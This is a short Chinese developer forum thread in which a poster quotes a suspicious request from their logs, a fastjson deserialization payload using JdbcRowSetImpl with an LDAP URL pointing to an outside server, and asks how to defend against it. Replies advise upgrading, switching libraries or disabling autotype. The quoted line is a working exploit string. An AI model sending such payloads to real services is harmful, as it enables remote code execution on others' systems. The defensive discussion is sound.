这是一个创建于 1450 天前的主题,其中的信息可能已经有所发展或是发生改变。
日志中查到有人发送异常参数至接口
{"x":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://9.4.131.68:1389/fastjsonfc5fd1bcac3b753a7d4fa9dab78d162e","autoCommit":true}} 查了下可能是 fastjson 反序列化攻击,目前项目使用的 fastjson 版本是 1.2.73 ,好像不在攻击范围内,请问下还有其他防御措施吗
 | 1 Jooooooooo 2022 年 5 月 6 日 换 jackson |
 | 2 moe3000 OP @Jooooooooo 下个、下个版本一定 |
 | 4 bthulu 2022 年 5 月 6 日  2 不在攻击范围内, 有空就升级到最新版, 没空就不管它. jackson 一样有这样的问题. |
 | 5 clf 2022 年 5 月 6 日 3 公司的代码规范检查插件里。就直接代码检查 com.alibaba 的包。有用到的禁止提交代码。gitlab 的 hooks 也是加了检查。 |
 | 10 banmuyutian 2022 年 5 月 7 日 @clf #5 我现在还用的阿里项目仅剩下 easyexcel |
 | 11 3C3Ju2wXX3tpBWEL 2022 年 5 月 7 日 1 脚本小子在瞎跑,不用太在意,结合业务看是否可以关闭自省 @type |
| 12 clf 2022 年 5 月 7 日 @banmuyutian 我们是直接用的 POI ,和基础服务的数据结构(比如表单等)封装了接口。 |
 | 13 xiaopigfly 2022 年 5 月 7 日 问题不大,只要放到公网就会有人扫描。正常的。 |
Select Language